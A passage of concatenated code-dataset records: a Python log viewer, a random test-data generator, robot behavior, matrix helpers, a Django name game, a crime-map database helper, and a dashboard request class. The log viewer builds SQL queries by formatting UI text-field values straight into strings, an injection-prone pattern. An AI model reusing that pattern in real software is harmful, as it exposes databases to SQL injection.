not testing:\n if ((x_coor>min_X or x_coormin_Y or y_coor= '{}' \".format(start_time)\n if end_time and start_time != \"00:00:00\" and start_time < end_time:\n sql += \"and time <= '{}' \".format(end_time)\n if len(level_list) > 0:\n for l in level_list:\n level = \"'\" + l + \"',\"\n \n 
print(level[:-1])\n sql += \"and level in ({}) \".format(level[:-1])\n \n return self.run_sql(sql)\n\n def modify_cmd(self):\n reply_type = 1\n if self.rb_random.isChecked():\n reply_type = 2\n self.run_sql(\"update cmd set value ='{}', remark='{}', reply_type ='{}' where id='{}'\".format(self.le_value.text(), self.le_remark.text(), reply_type, self.id))\n \n def run_sql(self, sql): \n conn = sqlite3.connect(self.db_file)\n cs = conn.cursor()\n print(\"execute sql:\" + sql)\n cs.execute(sql)\n if \"select\" in sql:\n return cs.fetchall() \n conn.commit()\n","sub_path":"kdJavaLogViewer/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"29023127","text":"#!/usr/bin/env python3\n\nimport os\nimport multiprocessing\nimport numpy as np\n\ndef random_file(para):\n np.random.seed(50)\n filename, size_mb = para\n with open(filename,'wb') as fl:\n for _ in range(size_mb):\n mb = np.random.bytes(1024*1024)\n fl.write(mb)\n print(\"created {0}\".format(filename))\n return\n\nif __name__ == \"__main__\":\n DIR = \"test_data\"\n N_FILE = 10\n SIZE_MB = 100\n\n try:\n os.mkdir(DIR)\n except:\n pass\n\n para = []\n for n in range(N_FILE):\n fl_name = os.path.join(DIR, \"file_öäüß_{0}.rnd\".format(n))\n para.append( (fl_name, SIZE_MB) )\n\n p = multiprocessing.Pool()\n list(p.imap_unordered(random_file, para))\n\n","sub_path":"tools/create_test_data.py","file_name":"create_test_data.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"377293612","text":"import behavior\nimport role_assignment\nimport re\n\n\nclass SingleRobotBehavior(behavior.Behavior):\n def __init__(self, continuous):\n super().__init__(continuous)\n self._robot = None\n\n def execute_running(self):\n if self.robot == None:\n raise AssertionError(\n \"Error: execute_running() called on a single robot behavior that doesn't have a robot!\")\n\n @property\n def robot(self):\n return self._robot\n\n @robot.setter\n def robot(self, value):\n self._robot = value\n\n def role_requirements(self):\n reqs = role_assignment.RoleRequirements()\n if self.robot != None:\n reqs.previous_shell_id = self.robot.shell_id()\n return reqs\n\n # assignments is a (RoleRequirements, OurRobot) tuple\n def assign_roles(self, assignments):\n if not isinstance(assignments, tuple) or len(assignments) > 2:\n raise AssertionError(\n \"Invalid call to assign_roles. 
Expected a tuple\")\n if len(assignments) == 2:\n import robocup\n if assignments[1] != None and not isinstance(assignments[1],\n robocup.OurRobot):\n raise TypeError(\n \"ERROR: attempt to assign robot to a non-robot object value: \"\n + str(assignments[1]))\n self.robot = assignments[1]\n\n def __str__(self):\n desc = super().__str__()\n desc += \"[robot=\" + (str(self.robot.shell_id())\n if self.robot != None else \"None\") + \"]\"\n if self.robot != None:\n indent = ' '\n cmd_text = self.robot.get_cmd_text()[:-1]\n if len(cmd_text) > 0:\n cmd_text = re.sub(r'\\n', '\\n' + indent, '\\n' + cmd_text)\n desc += cmd_text\n return desc\n","sub_path":"soccer/gameplay/single_robot_behavior.py","file_name":"single_robot_behavior.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"516044376","text":"##\n## EPITECH PROJECT, 2020\n## 108\n## File description:\n## mul_matrices.py\n##\n\ndef get_result_line(matrice):\n result_line = []\n for x in range(len(matrice[0])):\n result_line.append(0)\n return result_line\n\ndef get_result_matrice(mat_one, mat_two):\n result_mat = []\n for x in range(len(mat_one)):\n result_mat.append(get_result_line(mat_two))\n return result_mat\n\ndef check_one_line(mat):\n tmp = []\n tmp.append(mat)\n try:\n len(tmp[0][0])\n except TypeError:\n return tmp\n return mat\n\ndef mul_mat(mat_one, mat_two):\n mat_one = check_one_line(mat_one)\n mat_two = check_one_line(mat_two)\n result = get_result_matrice(mat_one, mat_two)\n\n for x in range(len(mat_one)):\n for i in range(len(mat_two[0])):\n for n in range(len(mat_two)):\n result[x][i] += mat_one[x][n] * mat_two[n][i]\n return result\n","sub_path":"108trigo/src/operator_matrice/mul_matrices.py","file_name":"mul_matrices.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"596103324","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse\nfrom . 
import forms\nfrom django.views.generic import FormView\n\n\n\n\ndef flames(request):\n form = forms.Flames(request.POST)\n if form.is_valid():\n form.save()\n your_name = form.cleaned_data['your_name']\n partner_name = form.cleaned_data['partner_name']\n # print(your_name)\n # print(partner_name)\n your_name = [i for i in your_name.lower()]\n partner_name = [i for i in partner_name.lower()]\n\n for i in range(len(your_name)):\n for i in your_name:\n if i in partner_name:\n your_name.remove(i)\n partner_name.remove(i)\n # print(your_name)\n # print(partner_name)\n\n\n count = len(your_name) + len(partner_name)\n flames = ['f','l','a','m','e','s']\n\n for i in range(5):\n value = (count % len(flames)) - 1\n flames.remove(flames[value])\n if(value>0):\n flames = flames[value:] + flames[:value]\n flames = flames[0]\n f_dict = {\n 'f': 'FRIENDSHIP',\n 'l': 'LOVE',\n 'a': 'AFFECTION',\n 'm': 'Marriage',\n 'e': 'Enemy',\n 's': 'Sister (Siblings)'\n }\n if (your_name != partner_name):\n out = f_dict[flames]\n elif (your_name == partner_name):\n out = \" Don't try to FOOL me, You love yourslef the most\"\n return render(request,\"flames.html\",{\"flames\" : out})\n return render(request,\"flames.html\",{'Form':form})\n\n\n","sub_path":"flames/calculator/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"556300746","text":"# -*- coding: utf-8 -*-\nimport pymysql\nimport dbconfig\nimport datetime\nclass DBHelper:\n\n def connect(self,database=\"crimemap\"):\n connection = pymysql.connect(host='localhost',\n user=dbconfig.db_user,\n password=dbconfig.db_password,\n database=dbconfig.db_name)\n return connection\n\n def get_all_crimes(self):\n connection = self.connect()\n try:\n query = \"SELECT * FROM crimes;\"\n with connection.cursor() as cursor:\n cursor.execute(query)\n json_crimes = []\n for crime in cursor:\n json_crimes.append({\n 'id' : crime[0],\n 'category' : crime[1],\n 'title' : crime[2],\n 'latitude' : crime[3],\n 'longitude' : crime[4],\n 'date' : datetime.datetime.strftime(crime[5], '%d-%m-%y'),\n 'description' : crime[6],\n 'added' : datetime.datetime.strftime(crime[7], '%d-%m-%y'),\n })\n return json_crimes\n finally:\n connection.close()\n\n def add_crime(self,category,title,date,latitude,longitude,description):\n connection = self.connect()\n try:\n query = \"INSERT INTO crimes (category,title,date,latitude,longitude,description) VALUES (%s, %s, %s, %s, %s, %s);\"\n with connection.cursor() as cursor:\n cursor.execute(query,(category,title,date,latitude,longitude,description))\n connection.commit()\n except Exception as e:\n print(e)\n finally:\n connection.close()\n","sub_path":"dbhelper.py","file_name":"dbhelper.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"29103323","text":"import lab as B\nfrom algebra import proven\nfrom wbml.warning import warn_upmodule\n\nfrom .util import align_batch\nfrom ..constant import Constant, Zero\nfrom ..diagonal import Diagonal\nfrom ..kronecker import Kronecker\nfrom ..lowrank import LowRank\nfrom ..matrix import AbstractMatrix, Dense, structured\nfrom ..shape import assert_compatible\nfrom ..triangular import LowerTriangular, UpperTriangular\nfrom ..util import ToDenseWarning, redirect\nfrom ..woodbury import Woodbury\n\n__all__ = []\n\n\ndef _reverse_call(t0, t1):\n @B.multiply.dispatch\n def multiply(a: t1, b: 
t0):\n return multiply(b, a)\n\n\n# Zero\n\n\n@B.dispatch(precedence=proven())\ndef multiply(a: AbstractMatrix, b: Zero):\n assert_compatible(B.shape(a), B.shape(b))\n return B.broadcast_to(b, *B.shape_broadcast(a, b))\n\n\n@B.dispatch(precedence=proven())\ndef multiply(a: Zero, b: AbstractMatrix):\n assert_compatible(B.shape(a), B.shape(b))\n return B.broadcast_to(a, *B.shape_broadcast(a, b))\n\n\n# Dense\n\n\n@B.dispatch\ndef multiply(a: AbstractMatrix, b: AbstractMatrix):\n if structured(a, b):\n warn_upmodule(\n f\"Multiplying {a} and {b}: converting to dense.\", category=ToDenseWarning\n )\n return Dense(B.multiply(B.dense(a), B.dense(b)))\n\n\n@B.dispatch\ndef multiply(a: Dense, b: Dense):\n return Dense(B.multiply(a.mat, b.mat))\n\n\n# Diagonal\n\n\n@B.dispatch\ndef multiply(a: Diagonal, b: Diagonal):\n return Diagonal(B.multiply(a.diag, b.diag))\n\n\n@B.dispatch\ndef multiply(a: Diagonal, b: AbstractMatrix):\n assert_compatible(B.shape(a), B.shape(b))\n # In the case of broadcasting, `B.diag(b)` will get the diagonal of `b`, which may\n # not be equalt to the diagonal broadcasted version of `b`.\n rows, cols = B.shape_matrix(b)\n if rows == 1:\n # Due to broadcasting, the diagonal will be the one column.\n b_diag = B.squeeze(B.dense(b), axis=-2)\n elif cols == 1:\n # Due to broadcasting, the diagonal will be the one row.\n b_diag = B.squeeze(B.dense(b), axis=-1)\n else:\n # No broadcasting happening. Just get the diagonal.\n b_diag = B.diag(b)\n return Diagonal(B.multiply(a.diag, b_diag))\n\n\n_reverse_call(Diagonal, AbstractMatrix)\n\n\n# Constant\n\n\n@B.dispatch\ndef multiply(a: Constant, b: Constant):\n assert_compatible(B.shape(a), B.shape(b))\n return Constant(B.multiply(a.const, b.const), *B.shape_broadcast(a, b))\n\n\n@B.dispatch\ndef multiply(a: Constant, b: AbstractMatrix):\n assert_compatible(B.shape(a), B.shape(b))\n if structured(b):\n warn_upmodule(\n f\"Multiplying {a} and {b}: converting to dense.\", category=ToDenseWarning\n )\n return Dense(\n B.broadcast_to(\n B.multiply(\n B.expand_dims(a.const, axis=-1, times=2, ignore_scalar=True),\n B.dense(b),\n ),\n *B.shape_broadcast(a, b),\n )\n )\n\n\n@B.dispatch\ndef multiply(a: Constant, b: Diagonal):\n assert_compatible(B.shape(a), B.shape(b))\n return Diagonal(\n B.multiply(B.expand_dims(a.const, axis=-1, ignore_scalar=True), b.diag)\n )\n\n\n_reverse_call(Constant, AbstractMatrix)\n_reverse_call(Constant, Diagonal)\n\n\n# LowerTriangular\n\n\n@B.dispatch\ndef multiply(a: LowerTriangular, b: LowerTriangular):\n return LowerTriangular(B.multiply(a.mat, b.mat))\n\n\n@B.dispatch\ndef multiply(a: LowerTriangular, b: AbstractMatrix):\n # TODO: Optimise away `B.dense` call.\n return LowerTriangular(B.multiply(a.mat, B.dense(b)))\n\n\n@B.dispatch\ndef multiply(a: LowerTriangular, b: Constant):\n return LowerTriangular(\n B.multiply(a.mat, B.expand_dims(b.const, axis=-1, times=2, ignore_scalar=True))\n )\n\n\n_reverse_call(LowerTriangular, AbstractMatrix)\n_reverse_call(LowerTriangular, Constant)\n\nredirect(B.multiply, (LowerTriangular, Diagonal), (AbstractMatrix, Diagonal))\n\n\n# UpperTriangular\n\n\n@B.dispatch\ndef multiply(a: UpperTriangular, b: UpperTriangular):\n return UpperTriangular(B.multiply(a.mat, b.mat))\n\n\n@B.dispatch\ndef multiply(a: UpperTriangular, b: LowerTriangular):\n return Diagonal(B.multiply(B.diag(a), B.diag(b)))\n\n\n@B.dispatch\ndef multiply(a: UpperTriangular, b: AbstractMatrix):\n # TODO: Optimise away `B.dense` call.\n return UpperTriangular(B.multiply(a.mat, 
B.dense(b)))\n\n\n@B.dispatch\ndef multiply(a: UpperTriangular, b: Constant):\n return UpperTriangular(\n B.multiply(a.mat, B.expand_dims(b.const, axis=-1, times=2, ignore_scalar=True))\n )\n\n\n_reverse_call(UpperTriangular, LowerTriangular)\n_reverse_call(UpperTriangular, AbstractMatrix)\n_reverse_call(UpperTriangular, Constant)\n\nredirect(B.multiply, (UpperTriangular, Diagonal), (AbstractMatrix, Diagonal))\n\n\n# LowRank\n\n\n@B.dispatch\ndef multiply(a: LowRank, b: LowRank):\n assert_compatible(B.shape(a), B.shape(b))\n\n if structured(a.left, a.right, b.left, b.right):\n warn_upmodule(\n f\"Multiplying {a} and {b}: converting factors to dense.\",\n category=ToDenseWarning,\n )\n al, am, ar = B.dense(a.left), B.dense(a.middle), B.dense(a.right)\n bl, bm, br = B.dense(b.left), B.dense(b.middle), B.dense(b.right)\n\n # Perform broadcasting of batch dimensions.\n al, am, ar, bl, bm, br = align_batch(al, am, ar, bl, bm, br)\n offset = len(B.shape_batch(al))\n\n # Pick apart the matrices.\n al, ar = B.unstack(al, axis=offset + 1), B.unstack(ar, axis=offset + 1)\n bl, br = B.unstack(bl, axis=offset + 1), B.unstack(br, axis=offset + 1)\n am = [B.unstack(x, axis=offset) for x in B.unstack(am, axis=offset)]\n bm = [B.unstack(x, axis=offset) for x in B.unstack(bm, axis=offset)]\n\n # Construct the factors.\n left = B.stack(\n *[B.multiply(ali, blk) for ali in al for blk in bl],\n axis=offset + 1,\n )\n right = B.stack(\n *[B.multiply(arj, brl) for arj in ar for brl in br],\n axis=offset + 1,\n )\n middle = B.stack(\n *[\n B.stack(*[amij * bmkl for amij in ami for bmkl in bmk], axis=offset)\n for ami in am\n for bmk in bm\n ],\n axis=offset,\n )\n\n return LowRank(left, right, middle)\n\n\n@B.dispatch\ndef multiply(a: Constant, b: LowRank):\n assert_compatible(B.shape(a), B.shape(b))\n return LowRank(\n b.left,\n b.right,\n B.multiply(\n B.expand_dims(a.const, axis=-1, times=2, ignore_scalar=True),\n b.middle,\n ),\n )\n\n\n@B.dispatch\ndef multiply(a: LowRank, b: Constant):\n return multiply(b, a)\n\n\n# Woodbury\n\n\n@B.dispatch\ndef multiply(a: Woodbury, b: AbstractMatrix):\n # Expand out Woodbury matrices.\n return B.add(B.multiply(a.diag, b), B.multiply(a.lr, b))\n\n\n@B.dispatch\ndef multiply(a: AbstractMatrix, b: Woodbury):\n return multiply(b, a)\n\n\nredirect(B.multiply, (Woodbury, Woodbury), (Woodbury, AbstractMatrix), reverse=False)\nredirect(B.multiply, (Woodbury, Diagonal), (AbstractMatrix, Diagonal))\nredirect(B.multiply, (Woodbury, Constant), (Woodbury, AbstractMatrix))\nredirect(B.multiply, (Woodbury, LowerTriangular), (Woodbury, AbstractMatrix))\nredirect(B.multiply, (Woodbury, UpperTriangular), (Woodbury, AbstractMatrix))\n\n\n# Kronecker\n\n\n@B.dispatch\ndef multiply(a: Kronecker, b: Kronecker):\n left_compatible = B.shape_matrix(a.left) == B.shape_matrix(b.left)\n right_compatible = B.shape_matrix(a.right) == B.shape_matrix(b.right)\n if not (left_compatible and right_compatible):\n raise AssertionError(\n f\"Kronecker products {a} and {b} must be compatible, but they are not.\"\n )\n return Kronecker(B.multiply(a.left, b.left), B.multiply(a.right, b.right))\n\n\n@B.dispatch\ndef multiply(a: Constant, b: Kronecker):\n assert_compatible(B.shape(a), B.shape(b))\n return Kronecker(\n B.multiply(\n B.expand_dims(a.const, axis=-1, times=2, ignore_scalar=True), b.left\n ),\n b.right,\n )\n\n\n@B.dispatch\ndef multiply(a: Kronecker, b: Constant):\n return multiply(b, 
a)\n","sub_path":"matrix/ops/multiply.py","file_name":"multiply.py","file_ext":"py","file_size_in_byte":7882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"121304855","text":"'''\nThis script is not used for the final result, but it is to show that we also tried to use Siamese netwoks with triplet loss\n'''\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport random\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.utils.random import sample_without_replacement\nfrom pathlib import Path\nfrom tensorflow.python.keras.models import load_model, save_model\nfrom tensorflow.keras import applications\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import losses\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras import metrics\nfrom tensorflow.keras import Model\nfrom tensorflow.keras.applications import resnet\n\nIMAGE_WIDTH = 300\nIMAGE_HEIGHT = 300\ntarget_shape = (IMAGE_HEIGHT, IMAGE_WIDTH)\n\nROOT_DIRECTORY = \"./\"\nIMAGE_DIRECTORY = ROOT_DIRECTORY + \"task4_data/food/food/\"\nTRIPLETS_DIRECTORY = ROOT_DIRECTORY + \"task4_data/\"\nCHECKPOINTS_DIRECTORY = ROOT_DIRECTORY + \"task4_data/checkpoints/\"\n\n\ndef preprocess_image(filename):\n \"\"\"\n Load the specified file as a JPEG image, preprocess it and\n resize it to the target shape.\n \"\"\"\n\n image_string = tf.io.read_file(filename)\n image = tf.image.decode_jpeg(image_string, channels=3)\n image = tf.image.convert_image_dtype(image, tf.float32)\n # Resize the image to match the target size\n image = tf.image.resize(image, target_shape)\n image = resnet.preprocess_input(image)\n return image\n\n\ndef preprocess_triplets(anchor, positive, negative):\n \"\"\"\n Given the filenames corresponding to the three images, load and\n preprocess them.\n \"\"\"\n\n return (\n preprocess_image(anchor),\n preprocess_image(positive),\n preprocess_image(negative),\n )\n\naugment_image = tf.keras.Sequential([\n layers.experimental.preprocessing.RandomFlip(\"horizontal_and_vertical\"),\n layers.experimental.preprocessing.RandomRotation(0.2),\n layers.experimental.preprocessing.RandomZoom(0.2),\n layers.experimental.preprocessing.RandomContrast(0.3),\n])\n\n\ndef augment_triplets(anchor, positive, negative):\n \"\"\"\n Augment a triplet.\n \"\"\"\n\n return (\n augment_image(anchor),\n augment_image(positive),\n augment_image(negative),\n )\n\n\nclass DistanceLayer(layers.Layer):\n \"\"\"\n This layer is responsible for computing the distance between the anchor\n embedding and the positive embedding, and the anchor embedding and the\n negative embedding.\n \"\"\"\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n def call(self, anchor, positive, negative):\n ap_distance = tf.reduce_sum(tf.square(anchor - positive), -1)\n an_distance = tf.reduce_sum(tf.square(anchor - negative), -1)\n return (ap_distance, an_distance)\n\n\nclass SiameseModel(Model):\n \"\"\"The Siamese Network model with a custom training and testing loops.\n Computes the triplet loss using the three embeddings produced by the\n Siamese Network.\n The triplet loss is defined as:\n L(A, P, N) = max(‖f(A) - f(P)‖² - ‖f(A) - f(N)‖² + margin, 0)\n \"\"\"\n\n def __init__(self, siamese_network, margin=0.5):\n super(SiameseModel, self).__init__()\n self.siamese_network = siamese_network\n self.margin = margin\n self.loss_tracker = metrics.Mean(name=\"loss\")\n self.acc_tracker = metrics.Mean(name=\"acc\")\n\n def call(self, inputs):\n return 
self.siamese_network(inputs)\n\n def train_step(self, data):\n # GradientTape is a context manager that records every operation that\n # you do inside. We are using it here to compute the loss so we can get\n # the gradients and apply them using the optimizer specified in\n # `compile()`.\n with tf.GradientTape() as tape:\n ap_distance, an_distance = self._compute_distances(data)\n loss = self._compute_loss(ap_distance, an_distance)\n acc = self._compute_acc(ap_distance, an_distance)\n\n # Storing the gradients of the loss function with respect to the\n # weights/parameters.\n gradients = tape.gradient(loss, self.siamese_network.trainable_weights)\n\n # Applying the gradients on the model using the specified optimizer\n self.optimizer.apply_gradients(\n zip(gradients, self.siamese_network.trainable_weights)\n )\n\n # Let's update and return the training loss metric.\n self.loss_tracker.update_state(loss)\n self.acc_tracker.update_state(acc)\n return {\"loss\": self.loss_tracker.result(), \"acc\": self.acc_tracker.result()}\n\n def test_step(self, data):\n ap_distance, an_distance = self._compute_distances(data)\n loss = self._compute_loss(ap_distance, an_distance)\n acc = self._compute_acc(ap_distance, an_distance)\n\n # Let's update and return the loss metric.\n self.loss_tracker.update_state(loss)\n self.acc_tracker.update_state(acc)\n return {\"loss\": self.loss_tracker.result(), \"acc\": self.acc_tracker.result()}\n\n def _compute_distances(self, data):\n # The output of the network is a tuple containing the distances\n # between the anchor and the positive example, and the anchor and\n # the negative example.\n ap_distance, an_distance = self.siamese_network(data)\n return ap_distance, an_distance\n\n def _compute_loss(self, ap_distance, an_distance):\n # Computing the Triplet Loss by subtracting both distances and\n # making sure we don't get a negative value.\n loss = ap_distance - an_distance\n loss = tf.maximum(loss + self.margin, 0.0)\n return loss\n\n def _compute_acc(self, ap_distance, an_distance):\n # Cmomputing the accuracy\n acc = tf.math.reduce_mean(tf.cast(ap_distance < an_distance, dtype=tf.float32))\n return acc\n\n @property\n def metrics(self):\n # We need to list our metrics here so the `reset_states()` can be\n # called automatically.\n return [self.loss_tracker, self.acc_tracker]\n\n\ndef create_embedding():\n\n base_cnn = resnet.ResNet50(\n weights=\"imagenet\", input_shape=target_shape + (3,), pooling=\"max\", include_top=False\n )\n\n dense1 = layers.Dropout(0.3)(base_cnn.output)\n output = layers.Dense(128)(dense1)\n\n embedding = Model(base_cnn.input, output, name=\"Embedding\")\n\n trainable = False\n for layer in base_cnn.layers:\n if layer.name == \"conv5_block3_1_conv\":\n trainable = True\n layer.trainable = trainable\n\n return embedding\n\n\ndef create_model():\n\n embedding = create_embedding()\n\n\n anchor_input = layers.Input(name=\"anchor\", shape=target_shape + (3,))\n positive_input = layers.Input(name=\"positive\", shape=target_shape + (3,))\n negative_input = layers.Input(name=\"negative\", shape=target_shape + (3,))\n\n distances = DistanceLayer()(\n embedding(anchor_input),\n embedding(positive_input),\n embedding(negative_input),\n )\n\n siamese_network = Model(\n inputs=[anchor_input, positive_input, negative_input], outputs=distances\n )\n\n return embedding, siamese_network\n\n\ndef make_train_validation_test_triplets_list(triplet_file, random_seed=None):\n\n random.seed(random_seed)\n\n triplets = np.loadtxt(triplet_file)\n\n # sample 
part of the triplets\n n_triplets = len(triplets)\n triplets = triplets[sample_without_replacement(n_population=n_triplets, n_samples=40000)]\n\n train_triplets_file = \"./train_triplets_list.txt\"\n validation_triplets_file = \"./validation_triplets_list.txt\"\n test_triplets_file = \"./test_triplets_list.txt\"\n\n if os.path.exists(train_triplets_file) and os.path.exists(validation_triplets_file) and os.path.exists(test_triplets_file):\n triplets_train = np.loadtxt(train_triplets_file)\n triplets_validation = np.loadtxt(validation_triplets_file)\n triplets_test = np.loadtxt(test_triplets_file)\n \n else:\n train_images = random.sample(range(0, 5000), 3600) #list(range(0, 3800))\n\n triplets_train = [ t for t in triplets if (t[0] in train_images and t[1] in train_images and t[2] in train_images) ]\n triplets_vt = [ t for t in triplets if (t[0] not in train_images and t[1] not in train_images and t[2] not in train_images) ]\n\n triplets_validation, triplets_test = train_test_split(triplets_vt, train_size=0.5)\n\n np.savetxt(train_triplets_file, triplets_train)\n np.savetxt(validation_triplets_file, triplets_validation)\n np.savetxt(test_triplets_file, triplets_test)\n\n print(\"Train dataset size: %d\" %(len(triplets_train)))\n print(\"Validation dataset size: %d\" %(len(triplets_validation)))\n print(\"Test dataset size: %d\" %(len(triplets_test)))\n\n\n return triplets_train, triplets_validation, triplets_test\n\n\ndef make_list_of_image_paths(image_directory):\n return [ image_directory+(\"%05d.jpg\" %x) for x in range(10000) ]\n\n\ndef make_anchor_positive_negative_datasets(list_of_image_paths, triplets):\n\n anchor_images = [ list_of_image_paths[int(t[0])] for t in triplets ]\n positive_images = [ list_of_image_paths[int(t[1])] for t in triplets ]\n negative_images = [ list_of_image_paths[int(t[2])] for t in triplets ]\n\n anchor_dataset = tf.data.Dataset.from_tensor_slices(anchor_images)\n positive_dataset = tf.data.Dataset.from_tensor_slices(positive_images)\n negative_dataset = tf.data.Dataset.from_tensor_slices(negative_images)\n\n return anchor_dataset, positive_dataset, negative_dataset\n\n\ndef preprocess_dataset(list_of_image_paths, triplets, batch_size=16, shuffle=False, augment=False, random_seed=None):\n\n # Make anchor, positive, negativ images datasets\n anchor_dataset, positive_dataset, negative_dataset = make_anchor_positive_negative_datasets(list_of_image_paths, triplets)\n dataset = tf.data.Dataset.zip((anchor_dataset, positive_dataset, negative_dataset))\n \n # Shuffle\n if shuffle:\n dataset = dataset.shuffle(buffer_size=1024, seed=random_seed)\n \n # Preprocess\n dataset = dataset.map(preprocess_triplets)\n\n # Batch size\n dataset = dataset.batch(batch_size, drop_remainder=False)\n\n # Data augmentation\n if augment:\n dataset = dataset.map(augment_triplets)\n\n \n return dataset\n\n\ndef preprocess_dataset_test(list_of_image_paths, triplets, batch_size=16, random_seed=None):\n\n # Make anchor, positive, negativ images datasets\n anchor_dataset, positive_dataset, negative_dataset = make_anchor_positive_negative_datasets(list_of_image_paths, triplets)\n \n # Preprocess\n anchor_dataset = anchor_dataset.map(preprocess_image)\n positive_dataset = positive_dataset.map(preprocess_image)\n negative_dataset = negative_dataset.map(preprocess_image)\n \n # Batch size\n anchor_dataset = anchor_dataset.batch(batch_size, drop_remainder=False)\n positive_dataset = positive_dataset.batch(batch_size, drop_remainder=False)\n negative_dataset = negative_dataset.batch(batch_size, 
drop_remainder=False)\n\n return anchor_dataset, positive_dataset, negative_dataset\n\n\ndef load_triplets(triplets_train, triplets_validation, triplets_test, image_directory=IMAGE_DIRECTORY, random_seed=None):\n\n batch_size = 32\n\n list_of_image_paths = make_list_of_image_paths(image_directory)\n\n dataset_train = preprocess_dataset(list_of_image_paths, triplets_train , batch_size=batch_size, shuffle=True, augment=True , random_seed=random_seed)\n dataset_val = preprocess_dataset(list_of_image_paths, triplets_validation, batch_size=batch_size, shuffle=True, augment=False, random_seed=random_seed)\n dataset_test = preprocess_dataset(list_of_image_paths, triplets_test , batch_size=batch_size, shuffle=True, augment=False, random_seed=random_seed)\n\n return dataset_train, dataset_val, dataset_test\n\n\ndef load_test_dataset(triplets, image_directory=IMAGE_DIRECTORY, random_seed=None):\n\n batch_size = 32\n\n list_of_image_paths = make_list_of_image_paths(image_directory)\n anchor_dataset, positive_dataset, negative_dataset = preprocess_dataset_test(list_of_image_paths, triplets, batch_size=batch_size, random_seed=random_seed)\n\n return anchor_dataset, positive_dataset, negative_dataset\n\n\ndef distance(f1, f2):\n \"\"\"Compute distance between arrays of features.\"\"\"\n\n return np.sum((np.sum([f1, -f2], axis=0))**2, axis=1)\n\n\ndef make_predictions(features_a, features_b, features_c):\n \"\"\"Compute predictions\"\"\"\n\n d_ab = distance(features_a, features_b)\n d_ac = distance(features_a, features_c)\n pred = d_ab < d_ac\n return pred\n\n\ndef main_train(random_seed=1234):\n\n \n ## Make train data\n print(\"\\nMaking datasets...\")\n triplet_file = TRIPLETS_DIRECTORY + \"train_triplets.txt\"\n triplets_train, triplets_validation, triplets_test = make_train_validation_test_triplets_list(triplet_file, random_seed=random_seed)\n dataset_train, dataset_val, dataset_test = load_triplets(triplets_train, triplets_validation, triplets_test,random_seed=random_seed)\n\n\n embedding, siamese_network = create_model()\n \n print(\"\\nSiamese summary:\")\n print(siamese_network.summary())\n\n print(\"\\nEmbedding summary:\")\n print(embedding.summary())\n\n siamese_model = SiameseModel(siamese_network)\n siamese_model.compile(optimizer=optimizers.Adam())\n\n \n if not os.path.exists(CHECKPOINTS_DIRECTORY): os.makedirs(CHECKPOINTS_DIRECTORY)\n checkpoint_filepath = CHECKPOINTS_DIRECTORY + '{epoch:02d}-{val_loss:.2f}-{val_acc:.2f}.h5'\n model_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_filepath,\n save_weights_only=True,\n monitor='val_loss',\n save_best_only=False,\n save_freq=\"epoch\",\n )\n siamese_model.fit(dataset_train, epochs=10, validation_data=dataset_val, callbacks=[model_checkpoint_callback])\n\n embedding.save_weights(\"test_emb.h5\")\n siamese_network.save_weights(\"test_sia.h5\")\n\n return embedding, siamese_network\n\n\ndef main_predict(embedding=None, random_seed=1234):\n\n ## Make train data\n print(\"\\nMaking datasets...\")\n triplet_file = TRIPLETS_DIRECTORY + \"train_triplets.txt\"\n triplets_train, triplets_validation, triplets_test = make_train_validation_test_triplets_list(triplet_file, random_seed=random_seed)\n anchor_dataset, positive_dataset, negative_dataset = load_test_dataset(triplets_validation, random_seed=random_seed)\n\n if embedding is None:\n embedding, siamese_network = create_model()\n siamese_network.load_weights(CHECKPOINTS_DIRECTORY + \"03-0.66.h5\")\n else:\n embedding = embedding\n\n\n features_a = 
embedding.predict(anchor_dataset)\n features_b = embedding.predict(positive_dataset)\n features_c = embedding.predict(negative_dataset)\n\n predictions = make_predictions(features_a, features_b, features_c)\n print(predictions)\n print(np.mean(predictions==1))\n\n\n\nrandom_seed = None\nembedding, siamese_network = main_train(random_seed=random_seed)\nmain_predict(embedding=embedding, random_seed=random_seed)\n\n","sub_path":"task4/submission_folder/code/siamese_network.py","file_name":"siamese_network.py","file_ext":"py","file_size_in_byte":15007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"644924930","text":"from dataclasses import dataclass\nfrom base.common.models.request import SimpleRequestModel, BaseRequestModelKeys\n\n\n@dataclass\nclass AddDashboardRequestParams(BaseRequestModelKeys):\n DASHBOARD_CODE: str = \"DashboardCode\"\n DASHBOARD_TITLE: str = \"DashboardTitle\"\n DASHBOARD_HTML: str = \"DashboardHTML\"\n IS_VENDOR_MAINTAINED: str = \"IsVendorMaintained\"\n\n\nclass AddDashboardRequest(SimpleRequestModel):\n def __init__(self, dashboard_code, dashboard_title, dashboard_html, is_vendor_maintained, session_id, nonce,\n pretty_print):\n self.dashboard_code = dashboard_code\n self.dashboard_title = dashboard_title\n self.dashboard_html = dashboard_html\n self.is_vendor_maintained = is_vendor_maintained\n super().__init__(session_id=session_id, nonce=nonce, pretty_print=pretty_print)\n\n def to_params(self):\n args = super().to_params()\n args[AddDashboardRequestParams.DASHBOARD_CODE] = self.dashboard_code\n args[AddDashboardRequestParams.DASHBOARD_TITLE] = self.dashboard_title\n 